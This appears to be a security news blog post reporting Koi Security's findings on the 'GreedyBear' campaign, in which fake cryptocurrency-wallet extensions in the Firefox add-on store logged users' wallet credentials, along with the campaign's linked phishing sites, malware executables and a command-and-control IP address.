150 Crypto-Draining Extensions Flood Firefox Add-On Store

ByAdmin

A malicious campaign known as ‘GreedyBear’ has infiltrated the Mozilla Add-ons Store, targeting Firefox users with 150 harmful extensions and reportedly stealing around $1,000,000 from unsuspecting victims. Discovered and documented by Koi Security, this campaign impersonates cryptocurrency wallet extensions from reputable platforms such as MetaMask, TronLink, and Rabby. Initially, these extensions are uploaded in a benign form to gain acceptance by Firefox, allowing them to accumulate fake positive reviews. Subsequently, the publishers remove the original branding, replacing it with new names and logos while injecting malicious code designed to steal users’ wallet credentials and IP addresses. The malicious code functions as a keylogger, capturing input from form fields or displayed popups, which is then sent to the attackers’ server.

Koi Security’s findings reveal that the weaponised extensions capture wallet credentials directly from user input fields within the extension’s own popup interface, exfiltrating this data to a remote server controlled by the group. During the initialisation process, the extensions also transmit the victim’s external IP address, likely for tracking or targeting purposes. The crypto-draining operation is further supported by numerous Russian-speaking pirated software websites that distribute 500 distinct malware executables, alongside a network of sites impersonating Trezor, Jupiter Wallet, and fake wallet repair services. These sites are all linked to the same IP address, 185.208.156.66, which serves as a command-and-control hub for the GreedyBear operation. Koi Security reported its findings to Mozilla, leading to the removal of the offending extensions from the Firefox Add-ons Store. However, the scale and ease of execution highlight how AI can assist cybercriminals in creating large-scale schemes and quickly recovering from takedowns. The report indicates clear signs of AI-generated artifacts within the campaign’s code, making it easier for attackers to scale operations and evade detection. Notably, a previous large-scale attack on the Firefox Store occurred last month, involving over 40 fake extensions masquerading as wallets from various platforms. Despite Mozilla’s implementation of a detection system for crypto-drainer add-ons in June 2025, fraudulent extensions continue to infiltrate the Firefox Store. Koi Security also notes that the operators of GreedyBear are exploring expansion into the Chrome Web Store, having already identified a malicious Chrome extension named “Filecoin Wallet” that employs the same data-theft logic and communicates with the same IP address. 

Categories: Cybersecurity Threats, Malicious Software Distribution, Cryptocurrency Scams 

Tags: GreedyBear, Malicious Campaign, Firefox, Extensions, Cryptocurrency, Keylogger, IP Address, Malware, Command-and-Control, AI-Generated 

Leave a Reply

Your email address will not be published. Required fields are marked *